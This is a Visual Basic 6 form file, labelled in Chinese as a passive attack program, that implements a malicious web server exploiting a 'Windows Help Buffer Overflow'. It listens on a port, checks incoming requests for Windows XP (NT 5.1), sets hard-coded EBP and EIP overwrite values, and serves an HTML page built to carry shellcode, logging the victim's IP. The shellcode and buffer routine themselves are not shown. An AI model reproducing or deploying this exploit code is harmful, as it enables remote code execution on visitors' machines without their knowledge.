form1.frm

vb编写的一个被动攻击的代码

VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "mswinsck.ocx"
Begin VB.Form Form1 
   Caption         =   "Windows Help Buffer Overflow"
   ClientHeight    =   4965
   ClientLeft      =   60
   ClientTop       =   345
   ClientWidth     =   7200
   Icon            =   "Form1.frx":0000
   LinkTopic       =   "Form1"
   ScaleHeight     =   4965
   ScaleWidth      =   7200
   StartUpPosition =   3  'Windows Default
   Begin VB.TextBox Text2 
      Height          =   285
      Left            =   1440
      TabIndex        =   3
      Text            =   "80"
      Top             =   4560
      Width           =   855
   End
   Begin VB.CommandButton Command1 
      Caption         =   "Listen"
      Height          =   255
      Left            =   2760
      TabIndex        =   1
      Top             =   4560
      Width           =   1695
   End
   Begin VB.TextBox Text1 
      Height          =   4455
      Left            =   120
      MultiLine       =   -1  'True
      ScrollBars      =   3  'Both
      TabIndex        =   0
      Text            =   "Form1.frx":0442
      Top             =   0
      Width           =   6975
   End
   Begin MSWinsockLib.Winsock tcp 
      Index           =   0
      Left            =   6720
      Top             =   4560
      _ExtentX        =   741
      _ExtentY        =   741
      _Version        =   393216
   End
   Begin VB.Label Label1 
      Caption         =   "Http server port:"
      Height          =   255
      Left            =   120
      TabIndex        =   2
      Top             =   4560
      Width           =   1215
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Command1_Click()
NbSck = NbSck + 1
Load tcp(NbSck)
tcp(NbSck).LocalPort = Text2
tcp(NbSck).Listen
Text1 = "Listening on port " + Text2 + vbCrLf + "------------" + vbCrLf
Command1.Enabled = False
End Sub

Private Sub Form_Load()
NbSck = 0
End Sub

Private Sub tcp_ConnectionRequest(Index As Integer, ByVal requestID As Long)
On Error Resume Next
NbSck = NbSck + 1
Load tcp(NbSck)
tcp(NbSck).Accept requestID
End Sub

Private Sub tcp_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim Data As String
Dim Send_It As Boolean

tcp(Index).GetData Data
Text1 = Text1 + Data

If InStr(Text1, "indows NT 5.1") Then
    Text1 = "Client: " + tcp(Index).RemoteHostIP + vbCrLf + "Windows Version: NT 5.1" + vbCrLf + "-----------------------------"
    EBP = Chr(19) + Chr(216) + Chr(36) + Chr(17)
    EIP = Chr(84) + Chr(200) + Chr(19) + Chr(0)
    '0x0013c854
    Buildin_The_BuFFer
    Send_It = True
End If

If Send_It Then
    If tcp(Index).State = 7 Then
        tcp(Index).SendData vbCrLf + "HTTP/1.1 200 OK" + vbCrLf
        tcp(Index).SendData "Content-Length: " + Str(Len(Buffer) + 10000) & vbCrLf
        tcp(Index).SendData "Server: Evil." & vbCrLf
        tcp(Index).SendData "Date: Thu, 03 Oct 2002 17:57:10 GMT" & vbCrLf
        tcp(Index).SendData "Content-Type: text/html" & vbCrLf
        tcp(Index).SendData "Connection: Keep-Alive" + vbCrLf
        tcp(Index).SendData vbCrLf
        tcp(Index).SendData Html_Page
        Text1 = Text1 + vbCrLf + "buffer has been sent to " + tcp(Index).RemoteHostIP + vbCrLf
        Text1 = Text1 + "Buffer Size Was: " + Str(Len(Buffer)) + " bytes." + vbCrLf
        Text1 = Text1 + "First ShellCode size was: " + Str(Len(ShellCodeFrst)) + " bytes." + vbCrLf
        Text1 = Text1 + "Shellcode Size was: " + Str(Len(ShellCode)) + " bytes." + vbCrLf
    End If
End If

End Sub

Private Sub Text1_DblClick()
Text1 = ""
End Sub